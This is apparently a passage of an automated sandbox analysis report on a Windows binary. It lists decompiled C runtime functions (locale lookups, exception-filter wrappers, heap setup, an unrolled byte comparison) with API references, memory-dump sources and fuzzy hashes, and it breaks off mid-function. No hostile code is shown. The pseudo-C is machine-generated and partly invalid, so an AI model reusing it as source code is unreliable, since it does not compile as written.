                                            0x0031fb34
                                            0x00000000
                                            0x00000000
                                            0x0031fb3a
                                            0x0031fb3f
                                            0x0031fb43
                                            0x0031fb43
                                            0x0031fb11

                                            APIs
                                            • _wcscmp.LIBCMT ref: 0031FAD5
                                            • _wcscmp.LIBCMT ref: 0031FAE6
                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0031FD84,?,00000000), ref: 0031FB02
                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0031FD84,?,00000000), ref: 0031FB2C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocale_wcscmp
                                            • String ID: ACP$OCP
                                            • API String ID: 1351282208-711371036
                                            • Opcode ID: 446c65068064017ad59334c7129a039bc03a991db3e02458fa3a9060b38b3926
                                            • Instruction ID: 020bd2d57c257ae6b484a55aac5846f65789e6e0572c361b7a75759df71c7e5b
                                            • Opcode Fuzzy Hash: 446c65068064017ad59334c7129a039bc03a991db3e02458fa3a9060b38b3926
                                            • Instruction Fuzzy Hash: 9A018031308115AFDB2BAE18FC95ED937AC9F08760F15C029F905DA051E770DAC187D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00312537, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00312537(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                            0x0031253c
                                            0x0031254c

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,00000050,00314509,-000002D8,?,?,00000001), ref: 0031253C
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00312545
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: ab2eac910c1398e31df712f8badf482dcb189e4888e322d309ac19b562e3e8f1
                                            • Instruction ID: 3ffac31a54ea228b31cd71246c3cda16c736ff5d731cd00b6b55aa07a2e2d67e
                                            • Opcode Fuzzy Hash: ab2eac910c1398e31df712f8badf482dcb189e4888e322d309ac19b562e3e8f1
                                            • Instruction Fuzzy Hash: 11B09231044608EBCB522B91EC09B6C7F2DFB05756F408018F60D450618B7256128AE2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0031420B, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E0031420B(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0x333ad8; // 0xddacd37c
				_t6 = _t5 ^  *0x32e748;
				if(_t6 == 0) {
					 *0x331e10 = _a4;
					_t8 = EnumSystemLocalesW(E003141F7, 1);
					 *0x331e10 =  *0x331e10 & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}






                                            0x0031420e
                                            0x00314213
                                            0x00314219
                                            0x00314234
                                            0x00314239
                                            0x0031423f
                                            0x00314247
                                            0x0031421b
                                            0x00314229
                                            0x00314229

                                            APIs
                                            • EnumSystemLocalesW.KERNEL32(003141F7,00000001,?,0031EF99,0031F037,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00314239
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EnumLocalesSystem
                                            • String ID:
                                            • API String ID: 2099609381-0
                                            • Opcode ID: 1f02680e9e50183f4eebf5d39a8bf732c82eca6a7027282e9b1e97ba87ef4805
                                            • Instruction ID: dc8a8dd51aab2109ce171ad0ff492b1feb8b91263222bf3e97ec0ac2cebc2531
                                            • Opcode Fuzzy Hash: 1f02680e9e50183f4eebf5d39a8bf732c82eca6a7027282e9b1e97ba87ef4805
                                            • Instruction Fuzzy Hash: A7E0EC32150348BBDF13CF95EC86F993BAEFB0C756F044414F9188A560C7F2A6A19B44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00314248, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(00000000,20001004,?,003181CB,?,003181CB,?,20001004,?,00000002,?,00000004,?,00000000), ref: 0031426F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: fec89664f98dd7f231c8385e1baff09c458dd6ea429d05f8b985db646ca71b87
                                            • Instruction ID: e0901bfdb676031cf4ef86b80816f2f62ad463ca91f1a24db9cbbbc4a03672d5
                                            • Opcode Fuzzy Hash: fec89664f98dd7f231c8385e1baff09c458dd6ea429d05f8b985db646ca71b87
                                            • Instruction Fuzzy Hash: 51D01732400109BF9F039FD4EC06CEA3BADEB48364F018404F91885020DA32A5A19B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00312506, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00312506(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                            0x00312513

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0031250C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 96d667179b0520c987f3c95c2bec52c0a85921ce5cc1761743e89dc8dca3c1be
                                            • Instruction ID: 337008384d16b74f5fb8a2750c5bc673c5634308140a4540de495246d1260144
                                            • Opcode Fuzzy Hash: 96d667179b0520c987f3c95c2bec52c0a85921ce5cc1761743e89dc8dca3c1be
                                            • Instruction Fuzzy Hash: 83A0113000020CAB8B022B82EC088A83F2CEA023A2B808020F80C020208B32AA228AC0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00315367, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00315367() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x331e20 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                                            0x00315367
                                            0x0031536f
                                            0x0031537b

                                            APIs
                                            • GetProcessHeap.KERNEL32(0030E46E,0032CCA8,00000014,00000051,0032CB98,00000050,00000001), ref: 00315367
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: 3500a4c307eb50ea62ceb7293f8aae4f0e59e9c77c76387d49dd6e845791d4cf
                                            • Instruction ID: a7acd3a10b7cc87c0b1b8a524f4d028d1e70640558a4fbf4bbe6f0a612b49af3
                                            • Opcode Fuzzy Hash: 3500a4c307eb50ea62ceb7293f8aae4f0e59e9c77c76387d49dd6e845791d4cf
                                            • Instruction Fuzzy Hash: 34B012B130150247CB0A1B397C6410DB6DCA70C302B00403D7803C11A0DF31C4219E04
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00313364, Relevance: .3, Instructions: 345COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00313364(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                            0x00313364
                                            0x00313364
                                            0x0031336a
                                            0x003133f1
                                            0x003133f3
                                            0x003133f5
                                            0x00000000
                                            0x00000000
                                            0x003133fb
                                            0x00313401
                                            0x00313488
                                            0x0031348a
                                            0x0031348c
                                            0x00000000
                                            0x00000000
                                            0x00313492
                                            0x00313498
                                            0x0031351f
                                            0x00313521
                                            0x00313523
                                            0x00000000
                                            0x00000000
                                            0x00313529
                                            0x0031352f
                                            0x003135b6
                                            0x003135b8
                                            0x003135ba
                                            0x00000000
                                            0x00000000
                                            0x003135c0
                                            0x003135c6
                                            0x0031364d
                                            0x0031364f
                                            0x00313651
                                            0x00000000
                                            0x00000000
                                            0x0031365d
                                            0x003136e5
                                            0x003136e7
                                            0x003136e9
                                            0x00000000
                                            0x00000000
                                            0x003136ef
                                            0x003136f5
                                            0x0031377c
                                            0x0031377e
                                            0x00313780
                                            0x00313780
                                            0x00000000
                                            0x00313780
                                            0x00313702
                                            0x00313704
                                            0x0031371c
                                            0x00313724
                                            0x00313726
                                            0x0031373e
                                            0x00313746
                                            0x00313748
                                            0x00313760
                                            0x00313768
                                            0x0031376a
                                            0x00313773
                                            0x00313773
                                            0x00000000
                                            0x0031376a
                                            0x00313751
                                            0x0031375a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031375a
                                            0x0031372f
                                            0x00313738
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313738
                                            0x0031370d
                                            0x00313716
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313716
                                            0x0031366b
                                            0x0031366d
                                            0x00313685
                                            0x0031368d
                                            0x0031368f
                                            0x003136a7
                                            0x003136af
                                            0x003136b1
                                            0x003136c9
                                            0x003136d1
                                            0x003136d3
                                            0x003136dc
                                            0x003136dc
                                            0x00000000
                                            0x003136d3
                                            0x003136ba
                                            0x003136c3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003136c3
                                            0x00313698
                                            0x003136a1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003136a1
                                            0x00313676
                                            0x0031367f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031367f
                                            0x003135d3
                                            0x003135d5
                                            0x003135ed
                                            0x003135f5
                                            0x003135f7
                                            0x0031360f
                                            0x00313617
                                            0x00313619
                                            0x00313631
                                            0x00313639
                                            0x0031363b
                                            0x00313644
                                            0x00313644
                                            0x00000000
                                            0x0031363b
                                            0x00313622
                                            0x0031362b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031362b
                                            0x00313600
                                            0x00313609
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313609
                                            0x003135de
                                            0x003135e7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003135e7
                                            0x0031353c
                                            0x0031353e
                                            0x00313556
                                            0x0031355e
                                            0x00313560
                                            0x00313578
                                            0x00313580
                                            0x00313582
                                            0x0031359a
                                            0x003135a2
                                            0x003135a4
                                            0x003135ad
                                            0x003135ad
                                            0x00000000
                                            0x003135a4
                                            0x0031358b
                                            0x00313594
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313594
                                            0x00313569
                                            0x00313572
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313572
                                            0x00313547
                                            0x00313550
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313550
                                            0x003134a5
                                            0x003134a7
                                            0x003134bf
                                            0x003134c7
                                            0x003134c9
                                            0x003134e1
                                            0x003134e9
                                            0x003134eb
                                            0x00313503
                                            0x0031350b
                                            0x0031350d
                                            0x00313516
                                            0x00313516
                                            0x00000000
                                            0x0031350d
                                            0x003134f4
                                            0x003134fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003134fd
                                            0x003134d2
                                            0x003134db
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003134db
                                            0x003134b0
                                            0x003134b9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003134b9
                                            0x0031340e
                                            0x00313410
                                            0x00313428
                                            0x00313430
                                            0x00313432
                                            0x0031344a
                                            0x00313452
                                            0x00313454
                                            0x0031346c
                                            0x00313474
                                            0x00313476
                                            0x0031347f
                                            0x0031347f
                                            0x00000000
                                            0x00313476
                                            0x0031345d
                                            0x00313466
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313466
                                            0x0031343b
                                            0x00313444
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313444
                                            0x00313419
                                            0x00313422
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00313370
                                            0x00313370
                                            0x00313377
                                            0x00313379
                                            0x00313391
                                            0x00313391
                                            0x00313399
                                            0x0031339b
                                            0x003133b3
                                            0x003133b3
                                            0x003133bb
                                            0x003133bd
                                            0x003133d5
                                            0x003133d5
                                            0x003133dd
                                            0x003133df
                                            0x003133e8
                                            0x003133e8
                                            0x00000000
                                            0x003133df
                                            0x003133c3
                                            0x003133c6
                                            0x003133cf
                                            0x00312f27
                                            0x00312f27
                                            0x00313d18
                                            0x00313d18
                                            0x00000000
                                            0x003133cf
                                            0x003133a1
                                            0x003133a4
                                            0x003133ad
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003133ad
                                            0x0031337f
                                            0x00313382
                                            0x0031338b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031338b

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction ID: c25aded6953e67908006ca79db0f3c65f87f9d11a93cca63580710be42b0717a
                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction Fuzzy Hash: E7C1A63220509309DF2F4A3AD4744BFBAA15A9A7B131B176DE4B3CB5C4EF20C6B5D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00313799, Relevance: .3, Instructions: 341COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00313799(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
